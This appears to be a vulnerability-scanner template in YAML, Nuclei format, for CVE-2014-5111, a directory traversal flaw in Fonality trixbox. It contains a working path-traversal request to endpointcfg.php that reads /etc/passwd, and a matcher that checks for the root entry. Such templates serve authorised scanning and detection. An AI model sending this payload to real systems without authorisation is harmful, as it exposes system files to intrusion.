27 lines
850 B
YAML
27 lines
850 B
YAML
id: CVE-2014-5111
|
|
|
|
info:
|
|
name: Fonality trixbox - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
|
|
reference: |
|
|
- https://www.exploit-db.com/exploits/39351
|
|
- https://www.cvedetails.com/cve/CVE-2014-5111
|
|
tags: cve,cve2014,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |